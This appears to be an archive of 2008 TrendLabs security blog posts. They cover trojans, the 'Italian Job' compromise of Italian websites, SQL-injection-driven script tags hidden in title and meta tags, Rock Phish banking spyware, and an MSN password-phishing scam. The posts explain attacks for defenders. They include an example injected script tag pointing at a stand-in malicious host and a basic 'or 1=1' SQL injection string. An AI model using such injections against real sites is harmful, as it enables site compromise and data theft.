Posts filed under 'Malware'
May 6th, 2008 by Jasper Pimentel (Advanced Threats Researcher)
Last month started with an April Fool’s message being spammed around. The spammed email contained a link from where a variant of the Storm malware could be downloaded. Aside from that, we’ve had our usual fill of Trojans and malicious scripts that plagued compromised Web sites for April.
Notable Malware
TROJ_AGENT.AMAL
This Trojan poses as a browser plugin that must be installed first to view files that are supposed to come from a fake US federal judiciary Web site. Reported last April 15, the link to the fake site comes from spammed email messages claiming to be legitimate court subpoenas. To add credibility to the spammed email, the sender uses a uscourts.com email address, which may seem authentic to unsuspecting recipients of the message.
TROJ_SPAMBOT.AF
TROJ_SPAMBOT.AF is the Trend Micro detection for the malware behind Kraken, which is an emerging botnet rivaling the Storm botnet. Some researchers who have analyzed Kraken have stated that this may be a variant of the Bobax malware family.
TROJ_AGENT.AZZZ
Reported last April 5, this Trojan uses an old technique to trick users into compromising their systems. Users receive a spammed email, under the guise of a Microsoft security bulletin, urging the users to download a patch from a certain link present in the email. Of course, the patch is actually the malware itself, which Trend Micro detects as TROJ_AGENT.AZZZ.
WORM_NUWAR.JQ
TrendLabs researchers discovered a Web site that offers what looks like a YouTube-style streaming video service. The infection vector and messaging are actually still the same — that is, users are most likely to access this site via links on specially crafted blogs. What is interesting this time is that on the suspect site, users are required to download the so-called “Storm Codec” in order to view the video. Yes, you read that right: the codec is called Storm Codec. Of course, the “codec” is actually a NUWAR variant, which Trend Micro already detects as WORM_NUWAR.JQ since April 2.
Exploits and Vulnerabilities
BKDR_POISONIV.QI and EXPL_NEVAR.B
A backdoor exploiting a recent vulnerability in Microsoft’s GDI processing was discovered right after Patch Tuesday last April 8. A file named TOP.JPG has been found to do this. It arrives on a system as an executable, now detected as EXPL_NEVAR.B. With just this opening available to malware authors, they can do pretty much anything after exploiting this vulnerability. Its specific routine is to connect to a URL to download a file named WORD.GIF (also detected as BKDR_POISONIV.QI).
Web Incidents
JS_DLOADER.TVP and JS_IFRAME.US
Early this month, several Web sites have been compromised by search engine optimization (SEO) poisoning. Some of the compromised sites were that of the Washington State University and several news sites such as Sun Gazette and Tribune-Chronicle. For the past few months, education Web sites (*.edu) were the ones targeted for such attacks, averaging about three per month. In this recent incident, JS_IFRAME.US is the iFrame component that is inserted into the HTML code of the Web page. When the browser is redirected by this malicious iFrame, it downloads the malicious script file JS_DLOADER.TVP.
That’s it for today. As of this writing, it seems that another Italian Job is underway, with ~100 compromised Web sites. We shall take a look at more of this in next month’s malware roundup.
May 2nd, 2008 by Macky Cruz (Technical Communications)
In what may turn out to be an advanced one-year “toast” to the June 2007 mass infection that came to be known as the Italian Job, TrendLabs discovered 90 compromised Italian Web sites (all verified active as of this writing) at around 12:30 AM GMT. The compromised sites are varied; their only common thematic link seems to be the Italian language.
According to Trend Micro analysts, the attack rolls out like this:
1. The compromised Web sites contain obfuscated JavaScript code (detected as JS_AFIR.A) that redirects the browser to the malicious URL http://{BLOCKED}r.com/cgi-bin/index.cgi?grb&js=1.
The script checks the Internet Explorer version and language so it will only execute on Italian ones.
2. The said URL redirects to another URL: http://{BLOCKED}f.com/cgi-bin/index.cgi?grobin (blocked by Web Reputation Services since April 27).
The two malicious sites were found to be hosted in a single IP traced back to San Diego, California.
3. The said sites download TROJ_SINOWAL.CB (detected since April 26 GMT) from the same domain. TROJ_SINOWAL.CB then drops BKDR_SINOWAL.CF (detected since April 30 GMT), which in turn drops a rootkit component on the affected PC.
This rootkit component modifies certain sectors of the infected hard disk. It also hooks Driver.sys to protect these sectors from read and write operations from AV/security software.
See infection diagram below.
SINOWAL malware variants are known information stealer droppers.
As of this writing, TrendLabs has discovered two forms of this compromise: one is via an injected obfuscated script that redirects to a certain malicious URL, and the other is via a readable iFrame and the same obfuscated script.
It appears that this attack affects sites hosted in Italy by a single hosting provider — the same one that hosted the thousands of sites (mostly travel and leisure) in last year’s large-scale infection. This time, compromised sites include the following:
- The official site of Monica Bellucci (famous Italian model-actress)
- The Mercedes-Benz club of Italy
- The official Web page of Sabrina Salerno (Italian singer)
- A Johnny Depp fan site
- A fan site of Pearl Jam
Here are screenshots of the first three sites mentioned above:
Trend Micro customers are already protected from this threat. Web Threat Protection technology has prevented access to the malicious pages since 27 April 2008. The URLs have already been added to our emergency database and are blocked by WCS (Web Classify Server), making these accessible to customers. Also, the RootkitBuster tool is able to scan the MBR-rootkit component involved in this attack.
Last updated at 5:27 PM GMT, 3 May 2008
April 29th, 2008 by Alice Decker (Advanced Threats Researcher)
Some days ago our researchers from TrendLabs discovered an attack on Web sites from the European region. Since the number of compromised sites was low, and because they were immediately cleaned, we figured it might be just a proof of concept.
F-Secure researchers also announced a similar attack where more than 500,000 sites were affected.
The infection code was a <script > tag that pointed to a malicious URL. The new discovery here is that these malicious tags were inserted between the usual text tags <title > </title >. For example
<title >My Website <script src=http://maliciousURL.com > </script > </title >
and into <meta >, <a href= > <div class=”myclass” > etc. like for example <a href=http://goodURL <script src=http://maliciousURL > </script > >.
An infected Web site would display its infection in the browser window title:
While neither <title > nor <meta > tags are supposed to support <script >, some browsers are prone to syntax errors. They interpret any script tags wherever they are placed.
The visitors of the affected Web sites are thus exposed to threats active on their systems.
The massive infection of Web sites was done supposedly through automated SQL injection. This is not the first instance of this type of attack; unfortunately, it would not be the last time either.
What’s notable about SQL injections is that such attacks can be triggered any time, regardless of the security patch of the SQL server behind. The success of the attack depends on the Web application that uses SQL servers. A Web site with no field content control is pretty easy to fool into sending to the server a simple SQL command. To simplify:
“SELECT * FROM bank_data WHERE Userid=blah or 1=1”
The moral of this story is that cyber criminals will have an easy game as long as Web sites are made by construction kit users or from inexperienced developers that may not consider field content checking.
Trend Micro users are already protected, first through a generic detection of the script — as HTML_IFRAME.YC — and certainly through Web Threat Protection.
April 28th, 2008 by JM Hipolito (Technical Communications)
Our friends from RSA have recently reported about the latest one-two punch employed by the infamous Rock Phish gang (also reported here and here). Best known for their easy-to-use kits that yield professional looking phishing pages, Rock Phish now introduces information-stealing malware — dubbed as the Zeus Trojan.
This attack is reminiscent of the Bank of America phishing attack, which we reported several days ago, wherein users are prompted to install a “digital certificate” in order to access the bank’s online login page. Incidentally, the phishing page was also Rock Phish.
And apparently there were more: Trend Micro Advanced Threats Researcher Paul Ferguson and the TrendLabs Content Security team came across a couple of malicious “certificates” detected as TSPY_PAPRAS.AC and TSPY_PAPRAS.AD. These spyware each target the Comerica and Colonial banks, respectively.
Below are screenshots of the phishing email and Web page targeting Comerica account holders:
Traditional phishing involves phishers sending out email messages that lead users to a fake Web site resembling login pages of certain institutions or companies. This time they’ve made sure they can get sensitive user information even without getting users to log on to some fake page. They do this by planting a spy in users’ systems so any relevant user action can be transmitted to a remote server. Unprotected users thus stand to lose sensitive information.
This recent development even makes it more important to remind users to be wary of clicking links in email communications, and to keep scanning engines up-to-date.
Addtional text by Paul Oliveria
April 21st, 2008 by Alice Decker (Advanced Threats Researcher)
Do you know the story where a human and a monkey lived in two rooms separated by a single door?
The first part of the story says that after a while in that room, the human started to get curious and decided to find out what was happening behind the door. As the human peeked through the keyhole, what he saw was another eye, which apparently was the monkey’s.
Cyber criminals can use the simplest of methods and maximum yield by simply exploiting human curiosity. How?
The first step is to send a spam email message. This message is supposedly sent through well-known botnet infrastructure.
The message above was sent in German but it could be sent in any language. The message above reads “With our completely free service, you can find out whoever blocked you in MSN or deleted” in English.
The link opens a Web site that includes the invitation to use the free service to check the validity of the MSN account.
All the user has to do here is “to peek through the keyhole” by typing the MSN account and the right password to figure out if his account is “indeed blacklisted”. Of course no answer comes back but…What happens then?
If the data entered in these fields are valid then the user could be considered an accomplice for the next criminal actions done by the users of the engellembul@gmail.com mailbox, the mailbox where the data is sent.
This gives cyber criminals a free choice to use their unlawfully acquired data in any of their illicit activities. The hacked MSN account can be used to send out spam, distribute malware both through email and the instant messaging application, MSN Messenger. Apart from this, the unauthorized user will then have access to the mailbox and can gather personal data about the affected user.
Next Posts
Previous Posts
